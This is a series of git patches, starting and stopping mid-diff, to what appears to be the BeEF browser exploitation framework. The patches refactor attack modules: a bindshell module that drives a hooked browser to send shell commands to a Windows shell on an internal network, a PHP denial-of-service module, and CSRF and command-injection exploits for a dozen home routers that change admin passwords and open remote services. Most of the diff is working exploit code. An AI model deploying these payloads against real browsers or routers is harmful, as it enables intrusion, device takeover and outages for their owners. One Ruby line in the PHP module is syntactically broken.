+		balloon_text+= "<br/>Windows MediaPlayer: " + has_wmp; 
+		balloon_text+= "<br/>VLC: "            + has_vlc;
+		balloon_text+= "<br/>Foxit: "          + has_foxit;
 		balloon_text+= "<br/>RealPlayer: "     + has_realplayer;
 		balloon_text+= "<br/>Google Gears: "   + has_googlegears;
 		balloon_text+= "<br/>Date: "           + date_stamp;
@@ -67,7 +69,7 @@ var ZombiesMgr = function(zombies_tree_lists) {
 			'balloon_text' : balloon_text,
 			'check'        : false,
 			'domain'       : domain,
-            'port'         : port
+			'port'         : port
 		};
 
 		return new_zombie;
diff --git a/extensions/console/lib/shellinterface.rb b/extensions/console/lib/shellinterface.rb
index ff9082626..2051dd7cc 100644
--- a/extensions/console/lib/shellinterface.rb
+++ b/extensions/console/lib/shellinterface.rb
@@ -302,6 +302,7 @@ class ShellInterface
         ['Browser Components', 'Windows Media Player','HasWMP'], 
         ['Browser Components', 'VLC',                'HasVLC'],
         ['Browser Components', 'Foxit',              'HasFoxit'],
+        ['Browser Components', 'WebRTC',             'HasWebRTC'],
         ['Browser Components', 'ActiveX',            'HasActiveX'],
         ['Browser Components', 'Session Cookies',    'hasSessionCookies'],
         ['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],
@@ -310,7 +311,7 @@ class ShellInterface
         ['Hooked Page', 'Page Title',    'PageTitle'],
         ['Hooked Page', 'Page URI',      'PageURI'],
         ['Hooked Page', 'Page Referrer', 'PageReferrer'],
-        ['Hooked Page', 'Hook Host',  'HostName'],
+        ['Hooked Page', 'Hook Host',     'HostName'],
         ['Hooked Page', 'Cookies',       'Cookies'],
 
         # Host

From 7aaafc79aa78e5eacee657f54fc98f299b005658 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 26 May 2013 02:41:04 +0930
Subject: [PATCH 311/397] Remove bi-directional communication from IPEC win
 bindshell module

---
 .../inter_protocol_win_bindshell/command.js   | 91 ++++++-------------
 .../command.old.js                            | 86 ++++++++++++++++++
 .../inter_protocol_win_bindshell/config.yaml  |  6 +-
 .../inter_protocol_win_bindshell/module.rb    | 57 ++----------
 4 files changed, 127 insertions(+), 113 deletions(-)
 create mode 100644 modules/ipec/inter_protocol_win_bindshell/command.old.js

diff --git a/modules/ipec/inter_protocol_win_bindshell/command.js b/modules/ipec/inter_protocol_win_bindshell/command.js
index dfc372848..7fbe8b05e 100644
--- a/modules/ipec/inter_protocol_win_bindshell/command.js
+++ b/modules/ipec/inter_protocol_win_bindshell/command.js
@@ -6,74 +6,41 @@
 
 beef.execute(function() {
 
-	var target_ip = "<%= @ip %>";
-	var target_port = "<%= @port %>";
-	var cmd = "<%= @cmd %>";
-	var timeout = "<%= @command_timeout %>";
-	var internal_counter = 0;
-
-	cmd += " & echo __END_OF_WIN_IPC<%= @command_id %>__ & echo </pre>\"\" & echo <div id='ipc_content'>\"\"";
-
-	var iframe = document.createElement("iframe");
-	iframe.setAttribute("id","ipc_win_window_<%= @command_id %>");
-	iframe.setAttribute("style", "visibility:hidden;width:1px;height:1px;");
-	document.body.appendChild(iframe);
-
-	function do_submit(ip, port, content) {
-
-		var action = "http://" + ip + ":" + port + "/index.html?&cmd&";
-		var parent = window.location.href;
-
-		myform=document.createElement("form");
-		myform.setAttribute("name","data");
-		myform.setAttribute("method","post");
-		myform.setAttribute("enctype","multipart/form-data");
-		myform.setAttribute("action",action);
-		document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.document.body.appendChild(myform); 
-	
-		myExt = document.createElement("INPUT");
-		myExt.setAttribute("id",<%= @command_id %>);
-		myExt.setAttribute("name",<%= @command_id %>);
-		myExt.setAttribute("value",content);
-		myform.appendChild(myExt);
-		myExt = document.createElement("INPUT");
-		myExt.setAttribute("id","endTag");
-		myExt.setAttribute("name","</div>");
-		myExt.setAttribute("value","echo <scr"+"ipt>window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\"ipc_content\").innerHTML);</"+"script>\"\" & exit");
-
-		myform.appendChild(myExt);
-		myform.submit();
+	// validate payload
+	try {
+		var cmd = '<%= @commands.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+	} catch(e) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+		return;
 	}
 
-	function waituntilok() {
-
-		try {
-			if (/#ipc_result=/.test(document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location)) {
-				ipc_result = document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location.href;
-				output = ipc_result.substring(ipc_result.indexOf('#ipc_result=')+12,ipc_result.lastIndexOf('__END_OF_WIN_IPC<%= @command_id %>__'));
-				beef.net.send('<%= @command_url %>', <%= @command_id %>, "result="+decodeURI(output.replace(/%0A/gi, "<br>")).replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/&lt;br&gt;/gi, "<br>"));
-				document.body.removeChild(iframe);
-				return;
-			} else throw("command results haven't been returned yet");
-		} catch (e) {
-			internal_counter++;
-			if (internal_counter > timeout) {
-				beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Timeout after '+timeout+' seconds');
-				document.body.removeChild(iframe);
-				return;
-			}
-			setTimeout(function() {waituntilok()},1000);
-		}
+	// validate target host
+	var rhost = "<%= @rhost %>";
+	if (!rhost) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target host');
+		return;
 	}
 
-	if (!target_port || !target_ip || isNaN(target_port)) {
-		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed target host or target port');
-	} else if (target_port > 65535 || target_port < 0) {
+	// validate target port
+	var rport = "<%= @rport %>";
+	if (!rport || rport > 65535 || rport < 0 || isNaN(rport)) {
 		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port');
-	} else {
-		do_submit(target_ip, target_port, cmd);
-		waituntilok();
+		return;
 	}
 
+	// validate timeout
+	var timeout = "<%= @timeout %>";
+	if (isNaN(timeout)) timeout = 30;
+
+	// send commands
+	var win_ipec_form_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html?&cmd&", cmd + " & exit");
+	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Shell commands sent');
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(win_ipec_form_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout * 1000);
+
 });
 
diff --git a/modules/ipec/inter_protocol_win_bindshell/command.old.js b/modules/ipec/inter_protocol_win_bindshell/command.old.js
new file mode 100644
index 000000000..909637463
--- /dev/null
+++ b/modules/ipec/inter_protocol_win_bindshell/command.old.js
@@ -0,0 +1,86 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+// This is the old module which supports bi-directional communications for Firefox before version ~16
+beef.execute(function() {
+
+	var target_ip   = "<%= @ip %>";
+	var target_port = "<%= @port %>";
+	var cmd         = "<%= @cmd %>";
+	var timeout     = "<%= @command_timeout %>";
+	var internal_counter = 0;
+
+	cmd += " & echo __END_OF_WIN_IPC<%= @command_id %>__ & echo </pre>\"\" & echo <div id='ipc_content'>\"\"";
+
+	var iframe = document.createElement("iframe");
+	iframe.setAttribute("id","ipc_win_window_<%= @command_id %>");
+	iframe.setAttribute("style", "visibility:hidden;width:1px;height:1px;");
+	document.body.appendChild(iframe);
+
+	function do_submit(ip, port, content) {
+
+		var action = "http://" + ip + ":" + port + "/index.html?&cmd&";
+		var parent = window.location.href;
+
+		myform=document.createElement("form");
+		myform.setAttribute("name","data");
+		myform.setAttribute("method","post");
+		myform.setAttribute("enctype","multipart/form-data");
+		myform.setAttribute("action",action);
+		document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.document.body.appendChild(myform); 
+	
+		myExt = document.createElement("INPUT");
+		myExt.setAttribute("id",<%= @command_id %>);
+		myExt.setAttribute("name",<%= @command_id %>);
+		myExt.setAttribute("value",content);
+		myform.appendChild(myExt);
+		myExt = document.createElement("INPUT");
+		myExt.setAttribute("id","endTag");
+		myExt.setAttribute("name","</div>");
+		myExt.setAttribute("value","echo <scr"+"ipt>window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\"ipc_content\").innerHTML);</"+"script>\"\" & exit");
+
+		myform.appendChild(myExt);
+		myform.submit();
+	}
+
+	function waituntilok() {
+
+		try {
+			if (/#ipc_result=/.test(document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location)) {
+				ipc_result = document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location.href;
+				output = ipc_result.substring(ipc_result.indexOf('#ipc_result=')+12,ipc_result.lastIndexOf('__END_OF_WIN_IPC<%= @command_id %>__'));
+				beef.net.send('<%= @command_url %>', <%= @command_id %>, "result="+decodeURI(output.replace(/%0A/gi, "<br>")).replace(/</g, "&lt;").replace(/>/g, "&gt;").replace(/&lt;br&gt;/gi, "<br>"));
+				document.body.removeChild(iframe);
+				return;
+			} else throw("command results haven't been returned yet");
+		} catch (e) {
+			internal_counter++;
+			if (internal_counter > timeout) {
+				beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Timeout after '+timeout+' seconds');
+				document.body.removeChild(iframe);
+				return;
+			}
+			setTimeout(function() {waituntilok()},1000);
+		}
+	}
+
+	// validate target host
+	if (!target_ip) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target host');
+		return;
+	}
+
+	// validate target port
+	if (!target_port || target_port > 65535 || target_port < 0 || isNaN(target_port)) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port');
+		return;
+	}
+
+	// send commands
+	do_submit(target_ip, target_port, cmd);
+	waituntilok();
+
+});
+
diff --git a/modules/ipec/inter_protocol_win_bindshell/config.yaml b/modules/ipec/inter_protocol_win_bindshell/config.yaml
index 1355edb2b..3240851df 100644
--- a/modules/ipec/inter_protocol_win_bindshell/config.yaml
+++ b/modules/ipec/inter_protocol_win_bindshell/config.yaml
@@ -9,8 +9,8 @@ beef:
             enable: true
             category: "IPEC"
             name: "Bindshell (Windows)"
-            description: "Using Inter-protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input field. <br><br>The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet."
+            description: "Using Inter-Protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input field.<br/><br/>The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.<br/><br/>The results of the commands are not returned to BeEF.<br/><br/>Note: ampersands are required to seperate commands."
             authors: ["bcoles", "wade"]
             target:
-                working: ["FF"]
-                not_working: ["C", "S", "O", "IE"]
+                working: ["FF", "C"]
+                not_working: ["S", "O", "IE"]
diff --git a/modules/ipec/inter_protocol_win_bindshell/module.rb b/modules/ipec/inter_protocol_win_bindshell/module.rb
index ccb0d9b98..7be2302e3 100644
--- a/modules/ipec/inter_protocol_win_bindshell/module.rb
+++ b/modules/ipec/inter_protocol_win_bindshell/module.rb
@@ -4,67 +4,28 @@
 # See the file 'doc/COPYING' for copying permission
 #
 =begin
-[+] Summary:
-
-Using Inter-protocol Communication (IPC) the zombie browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input. The target address can be on the zombie's subnet which is potentially not directly accessible from the Internet.
-
-The command results are returned to the BeEF control panel.
-
-[+] Tested:
-
-o Working:
-	o Mozilla Firefox 4
-	o Mozilla Firefox 5
-
-o Not Working:
-	o Mozilla Firefox 5 with the NoScript extension
-	o Internet Explorer 8+
-	o Chrome 13
-	o Opera 11
-	o Safari 5
-
-[+] Notes:
-
-o The bindshell is closed once the module has completed. This is necessary otherwise the cmd.exe process will hang. To avoid this issue:
-
-	o use the netcat persistent listen "-L" option rather than the listen "-l" option; or
-
-	o remove the "& exit" portion of the JavaScript payload. Be aware that this will leave redundant cmd.exe processes running on the target system.
-
-o The NoScript extension for Firefox aborts the request when attempting to access a host on the internal network and displays the following warning:
-
-	[ABE] <LOCAL> Deny on {POST http://localhost:4444/index.html?&cmd& <<< about:blank - 7}
-	SYSTEM rule:
-	Site LOCAL
-	Accept from LOCAL
-	Deny
-
-o Internet Explorer is not supported as IE 8+ does not allow posting data to internal network addresses. Earlier versions of IE have not been tested.
-
-o Returning the shell command results is not supported in Chrome, Safari and Opera as JavaScript cannot be executed within the bindshell iframe. The shell commands are executed on the target shell however.
-
-o This module is incompatible with autorun. Upon completing the shell commands it will load the original hooked window in a child iframe resulting in an additional hook. This will result in an infinite loop if this module is set to autorun.
+The bindshell is closed once the module has completed. This is necessary otherwise the cmd.exe process will hang. To avoid this issue:
+	- use the netcat persistent listen "-L" option rather than the listen "-l" option; or
+	- remove the "& exit" portion of the JavaScript payload. Be aware that this will leave redundant cmd.exe processes running on the target system.
 
+Returning the shell command results is not supported in Firefox ~16+, IE, Chrome, Safari and Opera as JavaScript cannot be executed within the bindshell iframe due to content-type restrictions. The shell commands are executed on the target shell however.
 =end
 
 class Inter_protocol_win_bindshell < BeEF::Core::Command
   
   def self.options
     return [
-	{'name'=>'ip', 'ui_label' => 'Target Address', 'value' => 'localhost'},
-	{'name'=>'port', 'ui_label' => 'Target Port', 'value' => '4444'},
-	{'name'=>'command_timeout', 'ui_label'=>'Timeout (s)', 'value'=>'30'},
-	{'name'=>'cmd', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: the ampersands are required to seperate commands', 'type'=>'textarea', 'value'=>'echo User: & whoami & echo Directory Contents: & dir & echo HostName: & hostname & ipconfig & netstat -an', 'width'=>'200px' }
+	{'name'=>'rhost',   'ui_label'=>'Target Address', 'value'=>'127.0.0.1'},
+	{'name'=>'rport',   'ui_label'=>'Target Port',    'value'=>'4444'},
+	{'name'=>'timeout', 'ui_label'=>'Timeout (s)',    'value'=>'30'},
+	{'name'=>'commands','ui_label'=>'Shell Commands', 'description'=>'Enter shell commands to execute. Note: ampersands are required to seperate commands', 'type'=>'textarea', 'value'=>'echo User: & whoami & echo Directory Path: & pwd & echo Directory Contents: & dir & echo HostName: & hostname & ipconfig & netstat -an', 'width'=>'200px' }
     ]
   end
 
   def post_execute
     content = {}
     content['result'] = @datastore['result'] if not @datastore['result'].nil?
-    content['fail'] = @datastore['fail'] if not @datastore['fail'].nil?
-    if content.empty?
-      content['fail'] = 'No data was returned.'
-    end
+    content['fail']   = @datastore['fail']   if not @datastore['fail'].nil?
     save content
   end
 end

From 704b9790545ec8b61e30b3e07f05fa16104b8813 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 26 May 2013 02:48:04 +0930
Subject: [PATCH 312/397] minor syntax changes to php-5.3.9-dos module

---
 modules/exploits/php-5.3.9-dos/command.js | 8 ++++----
 modules/exploits/php-5.3.9-dos/module.rb  | 3 ++-
 2 files changed, 6 insertions(+), 5 deletions(-)

diff --git a/modules/exploits/php-5.3.9-dos/command.js b/modules/exploits/php-5.3.9-dos/command.js
index d8a534aa2..ead546736 100644
--- a/modules/exploits/php-5.3.9-dos/command.js
+++ b/modules/exploits/php-5.3.9-dos/command.js
@@ -32,7 +32,7 @@ function serializeObj (obj) {
 }
 
 // Run attack
-function attackSite (target_url) {
+function php_dos (target_url) {
     var bad = serializeObj(createEvilObj());
     var xhr = new XMLHttpRequest();
     xhr.open("POST", target_url, true);
@@ -42,10 +42,10 @@ function attackSite (target_url) {
 }
 
 try {
-    attackSite("<%= @url %>");
-    beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=request sent");
+    php_dos("<%= @url %>");
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=DoS request sent");
 } catch (e) {
-    beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=request failed&error="+e.toString());
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, "fail=request failed with error: "+e.toString());
 }
 
 });
diff --git a/modules/exploits/php-5.3.9-dos/module.rb b/modules/exploits/php-5.3.9-dos/module.rb
index a10bcf9b4..1ae637ae4 100644
--- a/modules/exploits/php-5.3.9-dos/module.rb
+++ b/modules/exploits/php-5.3.9-dos/module.rb
@@ -13,7 +13,8 @@ class Php_dos < BeEF::Core::Command
 
 	def post_execute
 		content = {}
-		content['result'] = @datastore['result']
+		content['result'] = @datastore['result'] if not @datastore['result'].nil?
+		content['fail]    = @datastore['fail']   if not @datastore['fail'].nil?
 		save content
 	end
 

From ab7a62e8a4e58ddd6ddc32a33c18aaf2c225eaed Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 27 May 2013 10:40:58 +0930
Subject: [PATCH 313/397] Update version

---
 VERSION     | 2 +-
 config.yaml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/VERSION b/VERSION
index a0071fa6f..1c48bbad1 100644
--- a/VERSION
+++ b/VERSION
@@ -4,4 +4,4 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.4.5-alpha
+0.4.4.6-alpha
diff --git a/config.yaml b/config.yaml
index 04d0226f1..54728de0d 100644
--- a/config.yaml
+++ b/config.yaml
@@ -6,7 +6,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.4.5-alpha'
+    version: '0.4.4.6-alpha'
     debug: false
 
     restrictions:

From 639d0611a63074262a8e20915079b095df1d4e70 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Mon, 27 May 2013 11:56:01 +0930
Subject: [PATCH 314/397] Add `command_id` to embedded iframe/img IDs for
 router exploits

This prevents a race condition where duplicate iframes/imgs are
created if a module is run twice simultaneously. The second iframe/img
was not being removed during `cleanup()`.
---
 .../3com_officeconnect_cmd_exec/command.js    |  7 ++--
 .../router/asmax_ar804gu_cmd_exec/command.js  |  2 +-
 .../router/bt_home_hub_csrf/command.js        | 18 +++++-----
 .../router/cisco_e2400_csrf/command.js        | 11 +++---
 .../router/comtrend_ct5367_csrf/command.js    | 17 +++++-----
 .../router/comtrend_ct5624_csrf/command.js    | 17 +++++-----
 .../router/dlink_dir_615_csrf/command.js      |  7 ++--
 .../router/dlink_dsl500t_csrf/command.js      |  9 ++---
 .../router/huawei_smartax_mt880/command.js    | 13 +++----
 .../router/linksys_befsr41_csrf/command.js    | 10 +++---
 .../router/linksys_wrt54g2_csrf/command.js    | 11 +++---
 .../router/linksys_wrt54g_csrf/command.js     | 34 ++++++++++---------
 .../router/virgin_superhub_csrf/command.js    | 25 +++++++-------
 13 files changed, 97 insertions(+), 84 deletions(-)

diff --git a/modules/exploits/router/3com_officeconnect_cmd_exec/command.js b/modules/exploits/router/3com_officeconnect_cmd_exec/command.js
index 0c96f5688..5f36c9bd6 100644
--- a/modules/exploits/router/3com_officeconnect_cmd_exec/command.js
+++ b/modules/exploits/router/3com_officeconnect_cmd_exec/command.js
@@ -9,8 +9,9 @@ beef.execute(function() {
 	var gateway = '<%= @base %>'; 
 	var path    = 'utility.cgi';
 	var cmd     = '<%= @cmd %>';
+	var timeout = 15;
 
-	var com_officeconnect_iframe = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
+	var com_officeconnect_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "GET", [
 		{'type':'hidden', 'name':'testType', 'value':'1'},
 		{'type':'hidden', 'name':'IP',       'value':'||'+cmd}
 	]);
@@ -18,9 +19,9 @@ beef.execute(function() {
 	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
 	cleanup = function() {
-		document.body.removeChild(com_officeconnect_iframe);
+		document.body.removeChild(com_officeconnect_iframe_<%= @command_id %>);
 	}
-	setTimeout("cleanup()", 15000);
+	setTimeout("cleanup()", timeout*1000);
 
 });
 
diff --git a/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js b/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js
index d0417c2fb..9a7da976c 100644
--- a/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js
+++ b/modules/exploits/router/asmax_ar804gu_cmd_exec/command.js
@@ -14,7 +14,7 @@ beef.execute(function() {
 	img.setAttribute("style","visibility:hidden");
 	img.setAttribute("width","0");
 	img.setAttribute("height","0");
-	img.id = 'asmax_ar804gu';
+	img.id = 'asmax_ar804gu_<%= @command_id %>';
 	img.src = gateway+path+cmd;
 	document.body.appendChild(img);
 
diff --git a/modules/exploits/router/bt_home_hub_csrf/command.js b/modules/exploits/router/bt_home_hub_csrf/command.js
index 7cb16cccd..2ab008044 100644
--- a/modules/exploits/router/bt_home_hub_csrf/command.js
+++ b/modules/exploits/router/bt_home_hub_csrf/command.js
@@ -6,21 +6,21 @@
 
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
-  var passwd = '<%= @password %>';
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-
-
-  var bt_home_hub_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST",
-      [{'type':'hidden', 'name':'0', 'value':'31'} ,
-       {'type':'hidden', 'name':'1', 'value':''},
-       {'type':'hidden', 'name':'30', 'value':passwd}]);
+  var bt_home_hub_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "/cgi/b/ras//?ce=1&be=1&l0=5&l1=5", "POST", [
+    {'type':'hidden', 'name':'0',  'value':'31'} ,
+    {'type':'hidden', 'name':'1',  'value':''},
+    {'type':'hidden', 'name':'30', 'value':passwd}
+  ]);
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(bt_home_hub_iframe);
+    document.body.removeChild(bt_home_hub_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 
diff --git a/modules/exploits/router/cisco_e2400_csrf/command.js b/modules/exploits/router/cisco_e2400_csrf/command.js
index fc226fa83..3a807e582 100644
--- a/modules/exploits/router/cisco_e2400_csrf/command.js
+++ b/modules/exploits/router/cisco_e2400_csrf/command.js
@@ -7,8 +7,9 @@
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
   var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var cisco_e2400_iframe1 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
+  var cisco_e2400_iframe1_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
       [
        {'type':'hidden', 'name':'submit_button',     'value':'Management'},
        {'type':'hidden', 'name':'change_action',     'value':''},
@@ -37,7 +38,7 @@ beef.execute(function() {
        {'type':'hidden', 'name':'upnp_internet_dis', 'value':'0'},
       ]);
 
-  var cisco_e2400_iframe2 = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
+  var cisco_e2400_iframe2_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "apply.cgi", "POST",
       [
        {'type':'hidden', 'name':'submit_button',       'value':'Firewall'},
        {'type':'hidden', 'name':'change_action',       'value':''},
@@ -59,10 +60,10 @@ beef.execute(function() {
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(cisco_e2400_iframe1);
-    document.body.removeChild(cisco_e2400_iframe2);
+    document.body.removeChild(cisco_e2400_iframe1_<%= @command_id %>);
+    document.body.removeChild(cisco_e2400_iframe2_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 
diff --git a/modules/exploits/router/comtrend_ct5367_csrf/command.js b/modules/exploits/router/comtrend_ct5367_csrf/command.js
index ec750b7e3..b9917bf6a 100644
--- a/modules/exploits/router/comtrend_ct5367_csrf/command.js
+++ b/modules/exploits/router/comtrend_ct5367_csrf/command.js
@@ -6,12 +6,13 @@
 
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
-  var passwd = '<%= @password %>';
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var ct5367_iframe1 = beef.dom.createInvisibleIframe();
-  ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
+  var ct5367_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe();
+  ct5367_iframe1_<%= @command_id %>.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
 
-  var ct5367_iframe2 = beef.dom.createInvisibleIframe();
+  var ct5367_iframe2_<%= @command_id %> = beef.dom.createInvisibleIframe();
 
   var form = document.createElement('form');
   form.setAttribute('action', gateway + "password.cgi");
@@ -37,16 +38,16 @@ beef.execute(function() {
   input.setAttribute('value', passwd);
   form.appendChild(input);
 
-  ct5367_iframe2.contentWindow.document.body.appendChild(form);
+  ct5367_iframe2_<%= @command_id %>.contentWindow.document.body.appendChild(form);
   form.submit();
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(ct5367_iframe1);
-    document.body.removeChild(ct5367_iframe2);
+    document.body.removeChild(ct5367_iframe1_<%= @command_id %>);
+    document.body.removeChild(ct5367_iframe2_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 
diff --git a/modules/exploits/router/comtrend_ct5624_csrf/command.js b/modules/exploits/router/comtrend_ct5624_csrf/command.js
index 1b740b447..08ecf84ae 100644
--- a/modules/exploits/router/comtrend_ct5624_csrf/command.js
+++ b/modules/exploits/router/comtrend_ct5624_csrf/command.js
@@ -6,21 +6,22 @@
 
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
-  var passwd = '<%= @password %>';
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var ct5367_iframe1 = beef.dom.createInvisibleIframe();
-  ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
+  var ct5367_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe();
+  ct5367_iframe1_<%= @command_id %>.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
 
-  var ct5367_iframe2 = beef.dom.createInvisibleIframe();
-  ct5367_iframe2.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd);
+  var ct5367_iframe2_<%= @command_id %> = beef.dom.createInvisibleIframe();
+  ct5367_iframe2_<%= @command_id %>.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd);
 
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(ct5367_iframe1);
-    document.body.removeChild(ct5367_iframe2);
+    document.body.removeChild(ct5367_iframe1_<%= @command_id %>);
+    document.body.removeChild(ct5367_iframe2_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 
diff --git a/modules/exploits/router/dlink_dir_615_csrf/command.js b/modules/exploits/router/dlink_dir_615_csrf/command.js
index 3adb3b1fe..8c7fd4599 100644
--- a/modules/exploits/router/dlink_dir_615_csrf/command.js
+++ b/modules/exploits/router/dlink_dir_615_csrf/command.js
@@ -7,8 +7,9 @@
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
   var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var dir615_iframe = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST",
+  var dir615_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "tools_admin.php", "POST",
       [{'type':'hidden', 'name':'ACTION_POST',     'value':'1'} ,
        {'type':'hidden', 'name':'apply',           'value':'Save Settings'},
        {'type':'hidden', 'name':'admin_name',      'value':'admin'},
@@ -23,9 +24,9 @@ beef.execute(function() {
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
-    document.body.removeChild(dir615_iframe);
+    document.body.removeChild(dir615_iframe_<%= @command_id %>);
   }
-  setTimeout("cleanup()", 15000);
+  setTimeout("cleanup()", timeout*1000);
 
 });
 
diff --git a/modules/exploits/router/dlink_dsl500t_csrf/command.js b/modules/exploits/router/dlink_dsl500t_csrf/command.js
index f546bb08a..c48624322 100644
--- a/modules/exploits/router/dlink_dsl500t_csrf/command.js
+++ b/modules/exploits/router/dlink_dsl500t_csrf/command.js
@@ -6,9 +6,10 @@
 
 beef.execute(function() {
   var gateway = '<%= @base %>'; 
-  var passwd = '<%= @password %>';
+  var passwd  = '<%= @password %>';
+  var timeout = 15;
 
-  var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST",
+  var dsl500t_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST",
       [{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} ,
        {'type':'hidden', 'name':'security:settings/username', 'value':'admin'},
        {'type':'hidden', 'name':'security:settings/password', 'value':passwd},
@@ -19,9 +20,9 @@ beef.execute(function() {
   beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
 
   cleanup = function() {
